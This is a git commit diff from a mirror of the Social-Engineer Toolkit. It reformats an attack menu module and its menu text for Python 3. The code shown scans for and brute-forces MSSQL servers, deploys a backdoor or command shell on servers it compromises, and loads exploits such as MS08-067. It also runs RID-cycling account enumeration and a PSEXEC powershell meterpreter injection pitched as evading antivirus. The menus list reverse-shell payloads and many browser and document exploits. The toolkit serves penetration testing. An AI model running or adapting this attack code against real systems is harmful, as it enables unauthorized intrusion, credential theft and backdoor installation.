Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-12-14 15:02:33 +00:00
Code Issues Projects Releases Packages Wiki Activity

pep8 and python3 refactoring

Browse source
This commit is contained in:
TrustedSec 2016-01-14 15:59:31 -05:00
parent 262fe6ffed
commit 723613f3ea
5 changed files with 457 additions and 344 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

287
src/core/fasttrack.py
View file

@ -31,51 +31,65 @@ try:
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
attack_vector_sql = raw_input(setprompt(["19", "21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
if choice != "2":
if choice !="":
print_error("You did not specify 1 or 2! Please try again.")
choice =raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
print("\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
if choice != "1":
if choice != "2":
if choice != "":
print_error(
"You did not specify 1 or 2! Please try again.")
choice = raw_input(
setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
if choice == "": choice = "1"
if choice == "":
choice = "1"
if choice == "1":
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
if choice == "2":
while 1:
range = raw_input(setprompt(["19","21","22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
range = raw_input(setprompt(
["19", "21", "22"], "Enter filename for SQL servers (ex. /root/sql.txt - note can be in format of ipaddr:port)"))
if not os.path.isfile(range):
print_error("File not found! Please type in the path to the file correctly.")
print_error(
"File not found! Please type in the path to the file correctly.")
else:
break
if choice == "1": port = "1433"
if choice == "2": port = "1433"
break
if choice == "1":
port = "1433"
if choice == "2":
port = "1433"
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
wordlist = raw_input(setprompt(
["19", "21", "22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "":
wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
username = raw_input(setprompt(
["19", "21", "22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "": username = "sa"
if username == "":
username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.")
print_status(
"If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = ''
print_status("Hunting for SQL servers.. This may take a little bit.")
print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
@ -84,7 +98,8 @@ try:
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
else:
# use udp discovery to get the SQL server IDP through 1434
# use udp discovery to get the SQL server IDP through
# 1434
sqlport = get_sql_port(range)
# UDP could be closed - defaulting to 1433
if sqlport != None:
@ -94,16 +109,19 @@ try:
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
print_warning(
"Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
print_status(
"Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
sql_servers = sql_servers + line + ","
# this will hold all of the SQL servers eventually
@ -122,13 +140,17 @@ try:
# start loop and brute force
for servers in sql_servers:
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
# this will return the following format ipaddr + "," +
# username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist)
sql_success = mssql.brute(
servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
# after each success or fail it will break
# into this to the above with a newline to
# be parsed later
master_list = master_list + sql_success + ":"
counter = 1
@ -136,16 +158,20 @@ try:
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist)
# we wont break out of the loop here incase theres multiple usernames we want to find
sql_success = mssql.brute(
servers, users, port, wordlist)
# we wont break out of the loop here incase
# theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
print_warning(
"Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
@ -154,23 +180,29 @@ try:
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
print_status(
"Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success=success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print " " + str(counter) + ". " + success
success = success.split(",")
success = bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[
3]) + bcolors.ENDC + " SQLPort: " + bcolors.BOLD + "%s" % (success[2]) + bcolors.ENDC
print(" " + str(counter) + ". " + success)
# increment counter
counter = counter + 1
print "\n 99. Return back to the main menu.\n"
print("\n 99. Return back to the main menu.\n")
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
select_server = raw_input(
setprompt(["19", "21", "22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
if select_server == "quit" or select_server == "exit":
break
if select_server == "":
select_server = "1"
if select_server == "99":
break
counter = 1
for success in master_names:
if success != "":
@ -179,22 +211,30 @@ try:
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "1"
print("\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) and/or powershell (vista,win7,2008,2012) or just a shell\n\n 1. Deploy Backdoor to System\n 2. Standard Windows Shell\n\n 99. Return back to the main menu.\n")
option = raw_input(
setprompt(["19", "21", "22"], "Which deployment option do you want [1]"))
if option == "":
option = "1"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file(setdir + "/fasttrack.options", "w")
if option == "99":
break
# specify we are using the fasttrack
# option, this disables some features
filewrite = file(
setdir + "/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1":
# import payloads for selection and prep
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3])
# import payloads for selection and
# prep
mssql.deploy_hex2binary(
success[0], success[2], success[1], success[3])
# straight up connect
if option == "2":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
mssql.cmdshell(success[0], success[2], success[
1], success[3], option)
# increment counter
counter = counter + 1
@ -202,51 +242,59 @@ try:
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
sql_server = raw_input(setprompt(
["19", "21", "23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(
setprompt(["19", "21", "23"], "Enter the SQL port to connect [1433]"))
if sql_port == "":
sql_port = "1433"
sql_username = raw_input(
setprompt(["19", "21", "23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
if sql_username == "":
sql_username = "sa"
sql_password = raw_input(
setprompt(["19", "21", "23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
import _mssql
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
conn = _mssql.connect(
sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception, e:
print e
except Exception as e:
print(e)
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
print_status(
"Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
print_status(
"Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
print("\n")
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
print(data)
except Exception as e:
print_warning(
"\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
@ -255,36 +303,50 @@ try:
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
create_menu(text.fasttrack_exploits_text1,
text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
range = raw_input(
setprompt(["19", "24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
try:
reload(src.fasttrack.exploits.ms08067)
except:
import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
try:
reload(src.fasttrack.exploits.firefox_3_6_16)
except:
import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
try:
reload(src.fasttrack.exploits.solarwinds)
except:
import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
try:
reload(src.fasttrack.exploits.rdpdos)
except:
import src.fasttrack.exploits.rdpdos
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
try:
reload(src.fasttrack.exploits.mysql_bypass)
except:
import src.fasttrack.exploits.mysql_bypass
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
try:
reload(src.fasttrack.exploits.f5)
except:
import src.fasttrack.exploits.f5
##################################
##################################
@ -293,9 +355,10 @@ try:
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
try:
reload(src.fasttrack.sccm.sccm_main)
except:
import src.fasttrack.sccm.sccm_main
##################################
##################################
@ -304,8 +367,8 @@ try:
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
subprocess.Popen("python %s/src/fasttrack/delldrac.py" %
(definepath), shell=True).wait()
##################################
##################################
@ -321,13 +384,16 @@ try:
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
""")
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
print("\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want.")
print("\n")
ipaddr = raw_input(
setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
print_status(
"Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(
["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
@ -343,20 +409,29 @@ try:
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
print_warning(
"You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(
setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
print_status(
"Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
start_rid = raw_input(
setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "":
start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
stop_rid = raw_input(
setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "":
stop_rid = "15000"
print_status(
"Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" %
(ipaddr, start_rid, stop_rid, dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
@ -368,9 +443,11 @@ try:
##################################
##################################
if attack_vector == "6":
print "\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n"
try: reload(src.fasttrack.psexec)
except: import src.fasttrack.psexec
print("\nPSEXEC Powershell Injection Attack:\n\nThis attack will inject a meterpreter backdoor through powershell memory injection. This will circumvent\nAnti-Virus since we will never touch disk. Will require Powershell to be installed on the remote victim\nmachine. You can use either straight passwords or hash values.\n")
try:
reload(src.fasttrack.psexec)
except:
import src.fasttrack.psexec
# handle keyboard exceptions
except KeyboardInterrupt:

222
src/core/menu/text.py
View file

@ -62,16 +62,16 @@ webattack_menu = ['Java Applet Attack Method',
'Web Jacking Attack Method',
'Multi-Attack Web Method',
'Full Screen Attack Method',
'HTA Attack Method',
'HTA Attack Method',
'0D']
fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'PSEXEC Powershell Injection',
'0D']
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'PSEXEC Powershell Injection',
'0D']
fasttrack_text = ("""
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
@ -81,12 +81,12 @@ completely rewritten and customized from scratch as to improve functionality and
""")
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
'RDP | Use after Free - Denial of Service',
'MySQL Authentication Bypass Exploit',
'F5 Root Authentication Bypass Exploit',
'0D']
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
'RDP | Use after Free - Denial of Service',
'MySQL Authentication Bypass Exploit',
'F5 Root Authentication Bypass Exploit',
'0D']
fasttrack_exploits_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
@ -94,8 +94,8 @@ menu has obscure exploits and ones that are primarily python driven. This will c
""")
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
'Connect directly to MSSQL',
'0D']
'Connect directly to MSSQL',
'0D']
fasttrack_mssql_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
@ -241,13 +241,13 @@ infectious_text = """
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'Import your own executable Specify a path for your own executable\n']
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'Import your own executable Specify a path for your own executable\n']
if operating_system == "windows" or msf_path == False:
payload_menu_1 = [
@ -264,17 +264,17 @@ What payload do you want to generate:
# used in gen_payload.py
payload_menu_2 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
#'Windows Bind Shell Execute payload and create an accepting port on remote system.',
#'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
'Download/Run your Own Executable Downloads an executable and runs it\n'
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
#'Windows Bind Shell Execute payload and create an accepting port on remote system.',
#'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
'Download/Run your Own Executable Downloads an executable and runs it\n'
]
@ -282,37 +282,37 @@ payload_menu_2_text = """\n"""
payload_menu_3_text = ""
payload_menu_3 = [
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
# called from create_payload.py associated dictionary = ms_attacks
create_payloads_menu = [
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
'SET Custom Written Document UNC LM SMB Capture Attack',
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
'Adobe Flash Player "Button" Remote Code Execution',
'Adobe CoolType SING Table "uniqueName" Overflow',
'Adobe Flash Player "newfunction" Invalid Pointer Use',
'Adobe Collab.collectEmailInfo Buffer Overflow',
'Adobe Collab.getIcon Buffer Overflow',
'Adobe JBIG2Decode Memory Corruption Exploit',
'Adobe PDF Embedded EXE Social Engineering',
'Adobe util.printf() Buffer Overflow',
'Custom EXE to VBA (sent via RAR) (RAR required)',
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
'SET Custom Written Document UNC LM SMB Capture Attack',
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
'Adobe Flash Player "Button" Remote Code Execution',
'Adobe CoolType SING Table "uniqueName" Overflow',
'Adobe Flash Player "newfunction" Invalid Pointer Use',
'Adobe Collab.collectEmailInfo Buffer Overflow',
'Adobe Collab.getIcon Buffer Overflow',
'Adobe JBIG2Decode Memory Corruption Exploit',
'Adobe PDF Embedded EXE Social Engineering',
'Adobe util.printf() Buffer Overflow',
'Custom EXE to VBA (sent via RAR) (RAR required)',
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
create_payloads_text = """
Select the file format exploit you want.
@ -320,52 +320,52 @@ create_payloads_text = """
********** PAYLOADS **********\n"""
browser_exploits_menu = [
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
'Java Applet JMX Remote Code Execution (2013-01-10)',
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
'Java 7 Applet Remote Code Execution (2012-08-26)',
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
'Adobe Flash Player Object Type Confusion (2012-05-04)',
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
'Internet Explorer CSS Import Use After Free (2010-11-29)',
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
'Java Applet JMX Remote Code Execution (2013-01-10)',
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
'Java 7 Applet Remote Code Execution (2012-08-26)',
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
